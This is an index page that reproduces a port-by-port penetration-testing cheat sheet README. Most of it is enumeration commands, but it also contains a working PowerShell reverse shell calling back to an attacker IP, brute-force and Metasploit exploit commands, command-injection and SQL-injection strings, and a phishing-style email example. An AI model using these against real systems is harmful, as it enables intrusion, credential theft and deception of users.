Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.
Awesome Lists | Featured Topics | Projects
https://github.com/0xtz/Enum_For_All

Last synced: 3 months ago
JSON representation
Host: GitHub
URL: https://github.com/0xtz/Enum_For_All
Owner: 0xtz
Created: 2020-05-25T16:21:05.000Z (over 4 years ago)
Default Branch: master
Last Pushed: 2020-07-01T19:45:45.000Z (over 4 years ago)
Last Synced: 2024-04-12T22:56:05.963Z (7 months ago)
Size: 218 KB
Stars: 162
Watchers: 12
Forks: 75
Open Issues: 0
Metadata Files:
- Readme: README.md
Awesome Lists containing this project

awesome-hacking-lists - 0xtz/Enum_For_All - (Others)
README

        ![](https://img.shields.io/github/stars/pandao/editor.md.svg) ![](https://img.shields.io/github/forks/pandao/editor.md.svg)

Table of Contents

=================

* [Table of Contents](#table-of-contents)

* [Recon](#Recon)

  * [File enumeration](#File-enumeration)

      * [Disk files](#Disk-files)

      * [Images](#Images)

      * [Audio](#Audio)

  * [Port 7 - Echo tcp/udp](#Port-7---Echo-tcp/udp)

  * [Port 21 - FTP](#Port-21---FTP)

  * [Port 22 - SSH](#Port-22---SSH)

  * [Port 23 - Telnet](#Port-23---Telnet)

  * [Port 25 - Telnet](#Port-25--Telnet)

  * [Port 43 - WHOIS](#Port-43---WHOIS)

  * [Port 53 - DNS](#Port-53---DNS)

  * [Port 69 - UDP - TFTP](#Port-69---UDP---TFTP)

  * [Port 79 - Finger](#Port-79---Finger)

  * [Kerberos - 88](#Kerberos---88)

  * [Port 110 - POP3](#Port-110---POP3)

  * [Port 995 / 110 - POP](#Port-995-/-110---POP)

  * [Port 111 - Rpcbind](#Port-111---Rpcbind)

  * [Port 113 - Ident](#Port-113---Ident)

  * [Port 123 - TNP](#Port-123---TNP)

  * [Port 135 - MSRPC](#Port-135---MSRPC)

  * [Port 139/445 - SMB](#Port-139/445---SMB)

  * [Port 143 / 993- IMAP](#Port-143-/-993--IMAP)

  * [Port 161/162 UDP - SNMP](#Port-161/162-UDP---NMP)

  * [Port - 194,6667,6660-7000 - IRC](#Port---194,6667,6660-7000---SIRC)

  * [Port 264 - Check Point FireWall-1](#Port-264---Check-Point-FireWall-1)

  * [LDAP - 389, 636, 3268, 3269](#LDAP---389,-636,-3268,-3269)

  * [HTTPS - 443](#HTTPS---443)

  * [Port 500 -  ISAKMP IPsec/IKE VPN](#Port-500---ISAKMP-IPsec/IKE-VPN)

  * [Port 502 - Modbus](#Port-502-Modbus)

  * [Port 512 - Rexec](#Port-512---Rexec)

  * [Port 513 - Rlogin](#Port-513---Rlogin)

  * [Port 514 - RSH](#Port-514---RSH)

  * [Port 515 - line printerdaemon LPd](#Port-515---line-printerdaemon-LPd)

  * [Port 541 - FortiNet SSLVPN](#541---FortiNet---SLVPN)

  * [Port 548 - Apple Filing Protocol (AFP)](#Port-548---Apple-Filing-Protocol-(AFP))

  * [Port 554 - RTSP](#Port-554---RTSP)

  * [Port 623 / UDP / TCP - IPMI](#Port-623-/-UDP-/-TCP---IPMI)

  * [Port 631 - Internet Printing Protocol(IPP)](#Port-631---Internet-Printing-Protocol(IPP))

  * [Port 873 - Rsync](#Port-873---Rsync)

  * [Port 1026 - Rusersd](#Port-1026---Rusersd)

  * [Port 1028 / 1099 - Java RMI](#Port-1028-/-1099---Java-RMI)

  * [Port 1030/1032/1033/1038](#Port-1030/1032/1033/1038)

  * [MSSQL - 1433](#MSSQL---1433)

  * [Port 1521 - Oracle](#Port-1521---Oracle)

  * [Port 1723 - PPTP](#Port-1723---PPTP)

  * [Port 1883 - MQTT (Mosquitto)](#Port-1883---MQTT (Mosquitto))

  * [Port 2049 - NFS TNS Listener](#Port-2049---NFS-TNS-Listener)

  * [Port 2100 - Oracle XML DB](#Port-2100---Oracle-XML-DB)

  * [Port 3260 - ISCSI](#Port-3260---ISCSI)

  * [Port 3299 - SAPRouter](#Port-3299---SAPRouter)

  * [MySQL - 3306](#MySQL---3306)

  * [Port 3339 - Oracle web interface](#Port-3339---Oracle-web-interface)

  * [Port 3389 - RDP](#Port-3389---RDP)

  * [Port 3632 - distcc](#Port-3632---distcc)

  * [Port 4369 - Erlang Port Mapper Daemon (epmd)](#Port-4369---Erlang-Port-Mapper-Daemon-(epmd))

  * [Port 5353 / UDP - Multicast DNS (mDNS)](#Port-5353-/-UDP---Multicast-DNS-(mDNS))

  * [Port 5432 / 5433 -  Postgresql](#Port-5432-/-5433----Postgresql)

  * [Port 5671 - AMQP](#Port-5671---AMQP)

  * [Port 5985 / 5986 - WinRM](#Port-5985-/-5986---WinRM)

  * [VNC - 5800 / 5801 / 5900 / 5901 -  VNC](#VNC---5800-/-5801-/-5900-/-5901----VNC)

  * [Port 5984 - CouchDB](#Port-5984---CouchDB)

  * [Port 6000 - X11](#Port-6000---X11)

  * [Port 8009 - Apache JServ Protocol (AJP)](#Port-8009---Apache-JServ-Protocol-(AJP))

  * [MsDeploy - 8172](#MsDeploy---8172)

  * [Webdav](#Webdav)

  * [Port 9042 / 9160 -  Cassandra](#Port-9042-/-9160---Cassandra)

  * [Port 9100 - Raw Printing (JetDirect, AppSocket, PDL-datastream)](#Port-9100---Raw-Printing-(JetDirect,-AppSocket,-PDL-datastream))

  * [Port 9200 - Elasticsearch](#Port-9200---Elasticsearch)

  * [Port  10000 - Network Data Management Protocol (ndmp)](#Port--10000---Network-Data-Management-Protocol-(ndmp))

  * [Port 11211 - Memcache](#Port-11211---Memcache)

  * [Port 15672 - RabbitMQ Management](#Port-15672---RabbitMQ-Management)

  * [Port 27017 / 27018 - MongoDB](#Port-27017-/-27018---MongoDB)

  * [Port 44818 / UDP / TCP - EthernetIP](#Port-44818-/-UDP-/-TCP---EthernetIP)

  * [Port 47808 / udp - BACNet](#Port-47808-/-udp---BACNet)

  * [Port 50030 / 50060 / 50070 / 50075 / 50090 - Hadoop](#Port-50030-/-50060-/-50070-/-50075-/-50090---Hadoop)

  * [Unknown ports](#Unknown-ports)

  * [Port 80 - web server](#Port-80---web-server)

     * [Url Brutforce](#Url-Brutforce)

     * [Default_Weak login](#Default_Weak-login)

     * [LFI-RFI](#LFI-RFI)

     * [Sql-injection](#Sql-injection)

     * [XSS](#XSS)

     * [Sql-login Bypass](#Sql-login-Bypass)

     * [Bypass img Upload](#Bypass-img-Upload)

  * [Online crackers](#Onlin-rackers)

* [Vulnerability analysis](#Vulnerability-analysis)

    * [Buffer Overflow](#Buffer-Overflow)

    * [Find xploits - Searchsploit and google](#Find-xploits---Searchsploit-and-google)

    * [Reverse Sells](#Reverse-Sells)

* [Privilege escalation](#Privilege-escalation)

    * [Common](#Common)

      * [Set up Webserver](#Set-up-Webserver)

      * [Set up FTP Server](#Set-up-FTP-Server)

      * [Filet ransfer](#Filet-ransfer)

    * [Linux](#Linux)

        * [Basic info](#Basic-info)

        * [Kernel exploits](#Kernel-exploits)

        * [Programs running as root](#Programs-running-as-root)

        * [Installed software](#Installed-software)

        * [Weak/reused/plaintext passwords](#Weak/reused/plaintext-passwords)

        * [Inside service](#Inside-service)

        * [Suid misconfiguration](#Suid-misconfiguration)

        * [Unmounted filesystems](#Unmounted-filesystems)

        * [Cronjob](#Cronjob)

        * [SSH Keys](#SSH-Keys)

        * [Bad path configuration)](#Bad-path-configuration)

        * [PS Monitor for cron](#PS-Monitor-for-cron)

        * [Linux Privesc Tools](#Linux-Privesc-Tools)

        * [Linux Precompiled Exploits](#Linux-Precompiled-Exploits)

    * [Windows](#Windows)

        * [Basic info](#Basic-info)

        * [Kernel exploits](#Kernel-exploits)

        * [Cleartext passwords](#Cleartext-passwords)

        * [Reconfigure service parameters](#Reconfigure-service-parameters)

        * [Dump process for passwords](#Dump-process-for-passwords)

        * [Inside service](#Inside-service)

        * [Programs running as root/system](#Programs-running-as-root/system)

        * [Installed software](#Installed-software)

        * [Scheduled tasks](#Scheduled-tasks)

        * [Weak passwords](#Weak-passwords)

        * [Add user and enable RDP](#Add-user-and-enable-RDP)

        * [Powershell sudo for Windows](#Powershell-sudo-for-Windows)

        * [Windows download with bitsadmin](#Windows-download-with-bitsadmin)

        * [Windows download with certutil.exe](#Windows-download-with-certutil.exe)

        * [Creating a wget VB Script on Windows](#Creating-a-wget-VB-Script-on-Windows)

        * [Windows download with powershell](#Windows-download-with-powershell)

        * [Windows Download from FTP](#Windows-Download-from-FTP)

        * [Windows create SMB Server transfer files](#Windows-create-SMB-Server-transfer-files)

        * [Pass The Hash](#Pass-The-Hash)

        * [Scripts](#Scripts)

            * [Useradd](#Useradd)

            * [Powershell Run As](#Powershell-Run-As)

            * [Powershell Reverse Shell](#Powershell-Reverse-Shell)

    * [Loot](#Loot)

        * [Linux](#Linux)

            * [Passwords and hashes](#Passwords-and-hashes)

            * [Dualhomed](#Dualhomed)

            * [Tcpdump](#Tcpdump)

            * [Interesting files](#Interesting-files)

            * [Databases](#Databases)

            * [SSH-Keys](#SSH-Keys)

            * [Browser](#Browser)

            * [Mail](#Mail)

            * [GUI](#GUI)

        * [Windows](#Windows)

            * [Passwords and hashes](#Passwords-and-hashes)

            * [Dualhomed](#Dualhomed)

            * [Tcpdump](#Tcpdump)

            * [Interesting files](#Interesting-files)

# Recon

```bash

# Enumerate subnet

nmap -sn 10.10.10.1/24

```

```bash

# Fast simple scan

nmap -sS 10.10.10.1/24

```

```sh

export IP=10.10.10.11

```

```bash

# Extracting Live IPs from Nmap Scan

nmap 10.1.1.1 --open -oG scan-results; cat scan-results | grep "/open" | cut -d " " -f 2 > exposed-services-ips

```

```bash

# Full complete slow scan with output

nmap -v -sT -A -T4 -p- -Pn --script vuln -oA full $IP

```

```bash

# Autorecon

python3 autorecon.py $IP

```

```bash

# Scan for UDP

nmap $IP -sU

unicornscan -mU -v -I $IP

```

```

# Connect to udp if one is open

nc -u $IP 48772

```

```

# Responder

responder -I eth0 -A

```

```

# Amass

amass enum $IP

```

```bash

# Generating nice scan report

nmap -sV IP_ADDRESS -oX scan.xml && xsltproc scan.xml -o "`date +%m%d%y`_report.html"

```

```bash

#Simple Port Knocking

for x in 7000 8000 9000; do nmap -Pn –host_timeout 201 –max-retries 0 -p $x 1.1.1.1; done

```

## File enumeration :

### Common :

```bash

# Check real file type

file file.xxx

```

```bash

# Analyze strings

strings file.xxx

strings -a -n 15 file.xxx # Check the entire file and outputs strings longer than 15 chars

```

```bash

# Check embedded files

binwalk file.xxx # Check

binwalk -e file.xxx # Extract

```

```bash

# Check as binary file in hex

ghex file.xxx

```

```bash

# Check metadata

exiftool file.xxx

```

```sh

# Stego tool for multiple formats

wget https://embeddedsw.net/zip/OpenPuff_release.zip

unzip OpenPuff_release.zip -d ./OpenPuff

wine OpenPuff/OpenPuff_release/OpenPuff.exe

```

### Disk files

```sh

# guestmount can mount any kind of disk file

sudo apt-get install libguestfs-tools

guestmount --add yourVirtualDisk.vhdx --inspector --ro /mnt/anydirectory

```

### Images

```sh

#Stego

wget http://www.caesum.com/handbook/Stegsolve.jar -O stegsolve.jar

chmod +x stegsolve.jar

java -jar stegsolve.jar

```

```sh

# Stegpy

stegpy -p file.png

```

```sh

# Check png corrupted

pngcheck -v image.jpeg

```

```sh

# Check what kind of image is

identify -verbose image.jpeg

```

### Audio

```sh

# Check spectrogram

wget https://code.soundsoftware.ac.uk/attachments/download/2561/sonic-visualiser_4.0_amd64.deb

dpkg -i sonic-visualiser_4.0_amd64.deb

```

```sh

#AudioStego

hideme stego.mp3 -f && cat output.txt

```

## Port 7 - Echo tcp/udp

```bash

# Contact Echo service (UDP)

nc -uvn $IP 7

Hello echo    #This is wat you send

Hello echo    #This is the response

```

References :

https://en.wikipedia.org/wiki/ECHO_protocol

## Port 21 - FTP

```bash

nmap --script ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 $IP

# Banner Grabbing

telnet -vn $IP 21

# Anonymous login

ftp 

>anonymous

>anonymous

>ls -a # List all files

>binary #Set transmission to binary instead of ascii

>ascii #Set transmission to ascii instead of binary

>bye #exit

# Browser connection

ftp://anonymous:[email protected]

# Download all files

wget -m ftp://anonymous:anonymous@$IP #Donwload all

wget -m --no-passive ftp://anonymous:anonymous@$IP #Download all

```

## Port 22 - SSH

```bash

# Enumeration

nc -vn $IP 22

# Public SSH key of server

ssh-keyscan -t rsa $IP -p 

# BruteForce:

patator ssh_login host=$IP port=22 user=root 0=your_file.txt password=FILE0 -x ignore:mesg='Authentication failed.'

hydra -l user -P /usr/share/wordlists/password/rockyou.txt -e s ssh://10.10.1.111

medusa -h 10.10.1.111 -u user -P /usr/share/wordlists/password/rockyou.txt -e s -M ssh

ncrack --user user -P /usr/share/wordlists/password/rockyou.txt ssh://10.10.1.111

#Msf

use auxiliary/fuzzers/ssh/ssh_version_2

#SSH Enum users < 7.7:

python ssh_user_enum.py --port 2223 --userList /root/Downloads/users.txt $IP 2>/dev/null | grep "is a"

# Tunneling

sudo ssh -L :: -N -f @

```

https://github.com/six2dez/ssh_enum_script

https://www.exploit-db.com/exploits/45233

### Port 23 - Telnet

```bash

# Banner Grabbing

nc -vn $IP 23

# nmap

nmap -n -sV -Pn --script "*telnet* and safe" -p 23 $IP

```

### Port 25 - Telnet

```sh

# Finding MX servers of an organisation

dig +short mx google.com

# smtps

openssl s_client -starttls smtp -crlf -connect smtp.mailgun.org:587

# Enumeration

nmap -p25 --script smtp-commands $IP

# or use  nmap plugin smtp-ntlm-info.nse

# enum users

msf > auxiliary/scanner/smtp/smtp_enum

smtp-user-enum

nmap –script smtp-enum-users.nse $IP

```

```bash

# Send Email from linux console

[root:~] sendEmail -t [email protected] -f [email protected] -s 192.168.8.131 -u Important Upgrade Instructions -a /tmp/BestComputers-UpgradeInstructions.pdf

Reading message body from STDIN because the '-m' option was not used.

If you are manually typing in a message:

  - First line must be received within 60 seconds.

  - End manual input with a CTRL-D on its own line.

IT Dept,

We are sending this important file to all our customers. It contains very important instructions for upgrading and securing your software. Please read and let us know if you have any problems.

Sincerely,

```

### Port 43 - WHOIS

```bash

# Enumerate

whois -h $IP -p  "domain.tld"

echo "domain.ltd" | nc -vn $IP 

Also, the WHOIS service always needs to use a database to store and extract the information.

So, a possible SQLInjection could be present when querying the database from some information provided by the user.

For example doing: whois -h 10.10.10.155 -p 43 "a') or 1=1#"

you could be able to extract all the information saved in the database.

```

### Port 53 - DNS

```bash

# nslookup

nslookup

> SERVER  #Select dns server

> 127.0.0.1 #Reverse lookup of 127.0.0.1, maybe...

>  #Reverse lookup of a machine, maybe...

# DNS lookups, Zone Transfers & Brute-Force

whois domain.com

dig {a|txt|ns|mx} domain.com

dig {a|txt|ns|mx} domain.com @ns1.domain.com

host -t {a|txt|ns|mx} megacorpone.com

host -a megacorpone.com

host -l megacorpone.com ns1.megacorpone.com

dnsrecon -d megacorpone.com -t axfr @ns2.megacorpone.com

dnsenum domain.com

# DNS - Subdomains BF

dnsrecon -D subdomains-1000.txt -d  -n 

dnscan -d  -r -w subdomains-1000.txt #Bruteforce subdomains in recursive way, https://github.com/rbsec/dnscan

for sub in $(cat subdomains.txt);do host $sub.domain.com|grep "has.address";done

```

### Port 69 - UDP - TFTP

```bash

nmap -p69 --script=tftp-enum.nse $IP # Or

nmap -n -Pn -sU -p69 -sV --script tftp-enum $IPP

# Download Upload

msf5> auxiliary/admin/tftp/tftp_transfer_util

```

```python

import tftpy

client = tftpy.TftpClient(, )

client.download("filename in server", "/tmp/filename", timeout=5)

client.upload("filename to upload", "/local/path/file", timeout=5)

```

### Port 79 - Finger

```bash

# Enumeration Banner Grabbing/Basic connection

nc -vn  79

echo "root" | nc -vn $IP 79

# User enumeration

finger @$IP       #List users

finger admin@$IP  #Get info of user

finger user@$IP   #Get info of user

# msf

use auxiliary/scanner/finger/finger_users

# command exec

finger "|/bin/[email protected]"

finger "|/bin/ls -a /@example.com"

```

### Kerberos - 88

```bash

GET USERS:

nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN.LOCAL'" $IP

msf> use auxiliary/gather/kerberos_enumusers

python kerbrute.py -dc-ip IP -users /root/htb/kb_users.txt -passwords /root/pass_common_plus.txt -threads 20 -domain DOMAIN -outputfile kb_extracted_passwords.txt

```

> https://blog.stealthbits.com/extracting-service-account-passwords-with-kerberoasting/

> https://www.youtube.com/watch?v=snGeZlDQL2Q

> https://www.tarlogic.com/blog/como-funciona-kerberos/

> https://www.tarlogic.com/blog/como-atacar-kerberos/

### Port 110 - POP3

```bash

telnet $IP

USER taha@$IP

PASS admin

or:

USER admin

PASS admin

```

### Port 995 / 110 - POP

```bash

# Banner Grabbing

nc -nv $IP 110

openssl s_client -connect $IP:995 -crlf -quiet

# Automated

nmap --scripts "pop3-capabilities or pop3-ntlm-info" -sV -port  $IP

# POP syntax

POP commands:

  USER uid           Log in as "uid"

  PASS password      Substitue "password" for your actual password

  STAT               List number of messages, total mailbox size

  LIST               List messages and sizes

  RETR n             Show message n

  DELE n             Mark message n for deletion

  RSET               Undo any changes

  QUIT               Logout (expunges messages if no RSET)

  TOP msg n          Show first n lines of message number msg

  CAPA               Get capabilities

```

* http://sunnyoasis.com/services/emailviatelnet.html

### Port 111 - Rpcbind

```bash

# Enumeration

rpcinfo irked.htb # htb hhhh

nmap -sSUC -p111 $IP

rpcinfo -p $IP

rpcclient -U "" $IP

    srvinfo

    enumdomusers

    getdompwinfo

    querydominfo

    netshareenum

    netshareenumall

```

### Port 113 - Ident

```bash

# Nmap

-- By default (-sC) nmap will identify every user of every running port

```

### Port 123 - TNP

```bash

# Enumeration

nmap -sU -sV --script "ntp* and (discovery or vuln) and not (dos or brute)" -p 123 $IP

ntpq -c readlist $IP

ntpq -c readvar $IP

ntpq -c monlist $IP

ntpq -c peers $IP

ntpq -c listpeers $IP

ntpq -c associations $IP

ntpq -c sysinfo $IP

```

### Port 135 - MSRPC

```bash

# Enumeration

nmap $IP --script=msrpc-enum

nmap -n -sV -p 135 --script=msrpc-enum $IP

# Msf

msf > use exploit/windows/dcerpc/ms03_026_dcom

msf > use auxiliary/scanner/dcerpc/endpoint_mapper

msf > use auxiliary/scanner/dcerpc/hidden

msf > use auxiliary/scanner/dcerpc/management

msf > use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor

# Identifying Exposed RPC Services

rpcdump [-p port] $IP

IfId: 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc version 1.0

Annotation: Messenger Service

UUID: 00000000-0000-0000-0000-000000000000

Binding: ncadg_ip_udp:192.168.189.1[1028]

rpcdump.py $IP -p 135

```

### Port 139/445 - SMB

```bash

# Enum hostname

enum4linux -n $IP

nmblookup -A $IP

nmap --script=smb-enum* --script-args=unsafe=1 -T5 $IP

# Get Version

smbver.sh $IP

Msfconsole;use scanner/smb/smb_version

ngrep -i -d tap0 's.?a.?m.?b.?a.*[[:digit:]]'

smbclient -L \\\\$IP

# Get Shares

smbmap -H  $IP -R 

echo exit | smbclient -L \\\\

smbclient \\\\$IP\\

smbclient -L //$IP -N

nmap --script smb-enum-shares -p139,445 -T4 -Pn $IP

smbclient -L \\\\$IP\\

# Check null sessions

smbmap -H $IP

rpcclient -U "" -N $IP

smbclient //$IP/IPC$ -N

# Exploit null sessions

enum -s $IP

enum -U $IP

enum -P $IP

enum4linux -a $IP

/usr/share/doc/python3-impacket/examples/samrdump.py $IP

# Connect to username shares

smbclient //$IP/share -U username

# Connect to share anonymously

smbclient \\\\$IP\\

smbclient //$IP/

smbclient //$IP/

smbclient //$IP/<""share name"">

rpcclient -U " " $IP

rpcclient -U " " -N $IP

# Check vulns

nmap --script smb-vuln* -p139,445 -T4 -Pn $IP

# Check common security concerns

msfconsole -r /usr/share/metasploit-framwork/scripts/resource/smb_checks.rc

# Extra validation

msfconsole -r /usr/share/metasploit-framwork/scripts/resource/smb_validate.rc

# Multi exploits

msfconsole; use exploit/multi/samba/usermap_script; set lhost 192.168.0.X; set rhost $IP; run

# Bruteforce login

medusa -h $IP -u userhere -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -M smbnt

nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt $IP  -vvvv

nmap –script smb-brute $IP

# nmap smb enum & vuln

nmap --script smb-enum-*,smb-vuln-*,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-protocols -p 139,445 $IP

nmap --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse -p 139,445 $IP

# Mount smb volume linux

mount -t cifs -o username=user,password=password //$IP/share /mnt/share

# rpcclient commands

rpcclient -U "" $IP

    srvinfo

    enumdomusers

    getdompwinfo

    querydominfo

    netshareenum

    netshareenumall

# Run cmd over smb from linux

winexe -U username //$IP "cmd.exe" --system

# smbmap

    #Enum

smbmap.py -H $IP -u administrator -p asdf1234

    #RCE

smbmap.py -u username -p 'P@$$w0rd1234!' -d DOMAINNAME -x 'net group "Domain Admins" /domain' -H $IP

    # Drive Listing

smbmap.py -H $IP -u username -p 'P@$$w0rd1234!' -L

    # Reverse Shell

smbmap.py -u username -p 'P@$$w0rd1234!' -d ABC -H $IP -x 'powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""192.168.0.X""""; $port=""""4445"""";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize  ;$p=New-Object System.Diagnostics.Process  ;$p.StartInfo.FileName=""""cmd.exe""""  ;$p.StartInfo.RedirectStandardInput=1  ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0  ;$p.Start()  ;$is=$p.StandardInput  ;$os=$p.StandardOutput  ;Start-Sleep 1  ;$e=new-object System.Text.AsciiEncoding  ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length)  ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}}  if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else {  $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}}  $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"'

# Check

\Policies\{REG}\MACHINE\Preferences\Groups\Groups.xml look for user&pass "gpp-decrypt "

```

### Port 143 / 993- IMAP

```bash

# Banner grabbing

nc -nv $IP 143

openssl s_client -connect $IP:993 -quiet

# NTLM Auth - Information disclosure

-- use the nmap script imap-ntlm-info.nse

```

### Port 161/162 UDP - SNMP

```bash

nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes $IP

snmp-check $IP -c public|private|community

snmpwalk -v 2c -c public $ip

```

### Port - 194,6667,6660-7000 - IRC

```bash

# Enumeration

nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,6660-7000 irked.htb

```

### Port 264 - Check Point FireWall-1

```bash

msf > use auxiliary/gather/checkpoint_hostname

msf > set RHOST $IP

# read

* https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html#check-point-firewall-1-topology-port-264

```

### LDAP - 389, 636, 3268, 3269

```bash

# Basic Enumeration

nmap -n -sV --script "ldap* and not brute" $IP

# Clear text credentials

* If LDAP is used without SSL you can sniff credentials in plain text in the network.

ldapsearch -h $IP -p 389 -x -b "dc=mywebsite,dc=com"

ldapsearch -x -h $IP -D 'DOMAIN\user' -w 'hash-password'

ldapdomaindump $IP -u 'DOMAIN\user' -p 'hash-password'

ldapsearch -x -h $IP -D '\' -w '' -b "CN=Users,DC=<1_SUBDOMAIN>,DC="

#brut

ldapsearch -x -h $IP -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC="

ldapsearch -x -h $IP -D '\' -w '' -b "DC=<1_SUBDOMAIN>,DC="

patator ldap_login host=$IP 1=/root/Downloads/passwords_ssh.txt user=hsmith password=FILE1 -x ignore:mesg='Authentication failed.'

# for GUI

Graphical Interface

You can download a graphical interface with LDAP server here:

http://www.jxplorer.org/downloads/users.html

```

### HTTPS - 443

- Read the actual SSL CERT to:

    * find out potential correct vhost to GET

    * is the clock skewed

    * any names that could be usernames for bruteforce/guessing.

```bash

sslscan $IP:443

nmap -sV --script=ssl-heartbleed $IP

```

### Port 500 -  ISAKMP IPsec/IKE VPN

```bash

# enumeration

nmap -sU -p 500

ike-scan $IP

ike-scan -M $IP

```

As you can see in the previous response, there is a field called AUTH with the value PSK.

This means that the vpn is configured using a preshared key (and this is really good for a pentester).

* The value of the last line is also very important: *

*  0 returned handshake; 0 returned notify: This means the target is not an IPsec gateway.

* 1 returned handshake; 0 returned notify: This means the target is configured for IPsec and is willing to perform IKE negotiation, and either one or more of the transforms you proposed are acceptable (a valid transform will be shown in the output)

* 0 returned handshake; 1 returned notify: VPN gateways respond with a notify message when none of the transforms are acceptable (though some gateways do not, in which case further analysis and a revised proposal should be tried).

 Then, in this case we already have a valid transformation but if you are in the 3rd case, then you need to brute-force a little bit to find a valid transformation:

First of all you need to create all the possible transformations:

```bash

for ENC in 1 2 3 4 5 6 7/128 7/192 7/256 8; do for HASH in 1 2 3 4 5 6; do for AUTH in 1 2 3 4 5 6 7 8 64221 64222 64223 64224 65001 65002 65003 65004 65005 65006 65007 65008 65009 65010; do for GROUP in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18; do echo "--trans=$ENC,$HASH,$AUTH,$GROUP" >> ike-dict.txt ;done ;done ;done ;done

```

And then brute-force each one using ike-scan (this can take several minutes):

```bash

while read line; do (echo "Valid trans found: $line" && ike-scan -M $line ) | grep -B14 "1 returned handshake" | grep "Valid trans found" ; done < ike-dict.txt

```

* Reference Material

[PSK cracking paper](www.ernw.de/download/pskattack.pdf)

[SecurityFocus Infocus](www.securityfocus.com/infocus/1821)

[Scanning a VPN Implementation](http://www.radarhack.com/dir/papers/Scanning_ike_with_ikescan.pdf)

### Port 502 - Modbus

```bash

# Enumeration

nmap --script modbus-discover -p 502 $IP

msf> use auxiliary/scanner/scada/modbusdetect

msf> use auxiliary/scanner/scada/modbus_findunitid

```

### Port 512 - Rexec

\x90

### Port 513 - Rlogin

```bash

# login

apt install rsh-client

rlogin -l  $IP

```

### Port 514 - RSH

```bash

# Login

rsh $IP 

rsh $IP -l domain\user 

rsh domain/user@$IP 

rsh domain\\user@$IP 

```

### Port 515 - line printerdaemon LPd

```bash

# The lpdprint tool included in PRET is a minimalist way to print data directly to an LPD capable printer as shown below:

lpdprint.py hostname filename

```

If you want to learn more about [hacking printers read this page.](https://medium.com/@nickvangilder/exploiting-multifunction-printers-during-a-penetration-test-engagement-28d3840d8856)

### 541 - FortiNet SSLVPN

` \x90 `

### Port 548 - Apple Filing Protocol (AFP)

```bash

# enumeration

msf> use auxiliary/scanner/afp/afp_server_info

nmap -sV --script "afp-* and not dos and not brute" -p  $IP

```

### Port 554 - RTSP

- Web interface, transfer images, streaming

To formulate a Basic authentication element,

one simple has to base 64 encode  “:”  and add it to the request.

So a new request would look like:

```bash

DESCRIBE rtsp://: RTSP/1.0\r\nCSeq: 2\r\nAuthorization: Basic YWRtaW46MTIzNA==\r\n\r\n

```

Again note the request is terminated with the double “\r\n”.

The value YWRtaW46MTIzNA== is the base 64 encoded username and password concatenated with “:”.

In this case I have used “admin”/”1234”.

Some simple python scripting to try this out looks like:

```python

import socket

req = "DESCRIBE rtsp://: RTSP/1.0\r\nCSeq: 2\r\nAuthorization: Basic YWRtaW46MTIzNA==\r\n\r\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect(("192.168.1.1", 554))

s.sendall(req)

data = s.recv

print data

# Voila! You have access.

```

```bash

# enumeration

nmap -sV --scripts "rtsp-*" -p 554 $IP

```

> To bruteforce:

 https://github.com/Tek-Security-Group/rtsp_authgrinder

### Port 623 / UDP / TCP - IPMI

```bash

# Enumeration

nmap -n -p 623 10.0.0./24

nmap -n-sU -p 623 10.0.0./24

msf > use  auxiliary/scanner/ipmi/ipmi_version

# version

msf > use auxiliary/scanner/ipmi/ipmi_version

```

### Port 631 - Internet Printing Protocol(IPP)

> The Internet Printing Protocol (IPP) is defined in RFC2910 and RFC2911. It's an extendable protocol, for example ‘IPP Everywhere’ is a candidate for a standard in mobile and cloud printing and IPP extensions for 3D printing have been released.

> Because IPP is based on HTTP, it inherits all existing security features like basic/digest authentication and SSL/TLS encryption. To submit a print job or to retrieve status information from the printer, an HTTP POST request is sent to the IPP server listening on port 631/tcp. A famous open-source IPP implementation is CUPS,

> which is the default printing system in many Linux distributions and OS X. Similar to LPD,

> IPP is a channel to deploy the actual data to be printed and can be abused as a carrier for malicious PostScript or PJL files.

